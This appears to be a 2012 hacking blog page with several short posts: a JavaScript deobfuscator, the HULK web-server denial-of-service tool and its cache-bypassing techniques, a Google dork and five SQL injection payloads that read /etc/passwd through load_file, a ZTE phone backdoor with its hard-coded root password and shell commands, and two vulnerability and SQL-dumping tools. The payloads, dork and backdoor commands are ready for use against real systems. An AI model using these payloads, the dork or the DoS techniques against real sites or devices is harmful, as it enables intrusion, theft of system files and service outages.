May 18, 2012

Revelo: The Javascript Deobfuscator!

Analysing highly obfuscated the likes of exploit packs, obfuscated scriptwares et al. can be very difficult some times. In times like these, the aptly named Revelo can help. Revelo is Latin for “reveal”. The purpose of this tool is to assist the user in analyzing obfuscated JavaScript code, particularly those that redirect the browser to malicious URLs.

Revelo is not as full fledged as MalZilla. But I guess, doing what the now defunct MalZilla does is it’s purpose any way. Revelo automates some of the manual changes that are needed to de-obfuscate the script code. It is not a script debugger, just more like a set of tools to de-obfuscate scripts. Revelo by writing the JavaScript with some user-based modifcations to an HTML file, opening the file inside of the tool, and extracting the de-obfuscated elements using the Internet Explorer engine. All this is done, while allowing the  user to make choices based on his/her understanding of the obfuscated script.

Revelo in action:
Click Here

Revelo 0.3
Features of Revelo:

    Analyze a script quickly by loading a file or pasting in JavaScript code
    Includes several methods to de-obfuscate JavaScript
    Includes a built-in browser proxy which displays the URL of outgoing requests
    Displays the Document Object Model (DOM) elements
    Includes a packet sniffer which logs incoming and outgoing requests
    Includes a software firewall to prevent the program from accessing Internet content accidentally
    Ability to act as a web proxy to catch and block redirects
    Beautifies JavaScript code to make it more readable
    Ability to clear the browser cookies
    Ability to spoof the user-agent string

While this tool does have some protections built into it, it may execute malicious code that could harm your computer. So use it in a virtual machine. It has been tested to run on Windows XP systems. Features such as built-in firewall to protect a user from accidental redirects can also help. Revelo has a built-in packet sniffer and proxy so that the resulting HTTP request can be captured without actually visiting the site. It can also reveal the actual de-obfuscated code and has a built-in JavaScript beautifier. Revelo can help you the key elements of the JavaScript or even walk the DOM tree! It contains the free and the light on system Enigma Virtual Box among other activex controls.

From the looks of it, Revelo runs into a few problems on the Windows 7 operating system. But, if you use it as prescribed in a Windows XP VM (like we did), you wont face any problems.

Download Revelo:

Revelo v0.3 – Revelo –


If you like my blog, Please Donate Me

HULK, Web Server DoS Tool

Introducing HULK (Http Unbearable Load King).1-twitter-dos-data

In my line of work, I get to see tons of different nifty hacking tools, and traffic generation tools that are meant to either break and steal information off a system, or exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, finding that their main problem is always the same… they create repeatable patterns. too easy to predict the next request that is coming, and therefor mitigate. Some, although elegant, lack the horsepower to really put a system on its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Enforcing Python’s engines, I wrote a script that generates some nicely crafted unique Http requests, one after the other, generating a fair load on a webserver, eventually exhausting it of resources. this can be optimized much much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK, is to generate Unique requests for each and every request generated, thus avoiding/bypassing caching engines and effecting directly on the server’s load itself.

I have published it to Packet Storm, as we do.
Some Techniques

    Obfuscation of Source Client – this is done by using a list of known User Agents, and for every request that is constructed, the User Agent is a random value out of the known list
    Reference Forgery – the referer that points at the request is obfuscated and points into either the host itself or some major prelisted websites.
    Stickiness – using some standard Http command to try and ask the server to maintain open connections by using Keep-Alive with variable time window
    no-cache – this is a given, but by asking the HTTP server for no-cache , a server that is not behind a dedicated caching service will present a unique page.
    Unique Transformation of URL – to eliminate caching and other optimization tools, I crafted custom parameter names and values and they are randomized and attached to each request, rendering it to be Unique, causing the server to process the response on each event.


Basically my test web server with 4gb of Ram running Microsoft IIS7 was brought to its knees under less than a minute, running all requests from a single host.

In the pictures below you can see the tool in action, where it first ( #1 ) executed against a URL, and then the tool starts generating a load of unique requests and sending over the target server ( host of the URL ), and second ( #2 ) we can see that the server at some point starts failing to respond since it has exhausted its resource pool.

Note the “safe” word is meant to kill the process after all threads got a 500 error, since its easier to control in a lab, it is optional.

File : ( zip file )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.


If you like my blog, Please Donate Me

May 15, 2012

LFI with SQL Injection

Try to search with
inurl:"*.php?*=*"+ ( inurl:"*../*" + ( inurl:"LOAD_FILE" | inurl:"UNION" | inurl:"AND" ) ) + intext:"root:x:0:0:root:/root:**"
 Example that I found
  • ?id=-1+union+select+load_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764) 
  • ?category_ID=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--
  • ?id=36+UNION+all+SELECT%201,2,3,load_file(%27/etc/passwd%27)--
  • ?conf=-1198+UNION+SELECT+1,2,3,4,CONCAT(0x6d7973716c6669,load_file(0x2f6574632f706173737764),0x6d7973716c6669),6,7,8,9,10,11,12,13,14,15,16--
  • ?id=1067/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4/**/LIMIT/**/1,1/*

If you like my blog, Please Donate Me

May 14, 2012

Nice backdoor, ZTE.

    The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.
    There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.  Just give the magic, hard-coded password to get a root shell:
    $ sync_agent ztex1609523
    # id
    uid=0(root) gid=0(root)
    Nice backdoor, ZTE.



If you like my blog, Please Donate Me

May 13, 2012

WebVulScan - web application vulnerability scanner

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.
After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.
The vulnerabilities tested by WebVulScan are:
  • Reflected Cross-Site Scripting
  • Stored Cross-Site Scripting
  • Standard SQL Injection
  • Broken Authentication using SQL Injection
  • Autocomplete Enabled on Password Fields
  • Potentially Insecure Direct Object References
  • Directory Listing Enabled
  • HTTP Banner Disclosure
  • SSL Certificate not Trusted
  • Unvalidated Redirects
  • Crawler: Crawls a website to identify and display all URLs belonging to the website.
  • Scanner: Crawls a website and scans all URLs found for vulnerabilities.
  • Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
  • Register: Allows a user to register with the web application.
  • Login: Allows a user to login to the web application.
  • Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
  • PDF Generation: Dynamically generates a detailed PDF report.
  • Report Delivery: The PDF report is emailed to the user as an attachment.
This software was developed, and should only be used, entirely for ethical purposes. Running security testing tools such as this on a website (web application) could damage it. In order to stay ethical, you must ensure you have permission of the owners before testing a website (web application). Testing the security of a website (web application) without authorisation is unethical and against the law in many countries. 



If you like my blog, Please Donate Me

sqlcake - Automatic SQL injection and database information gathering tool.

Automatic dump database & interactive sql shell tool dumps the current database structure including tables and columns and turns into an interactive mysql prompt with extra features. Written in Ruby.

Download :

If you like my blog, Please Donate Me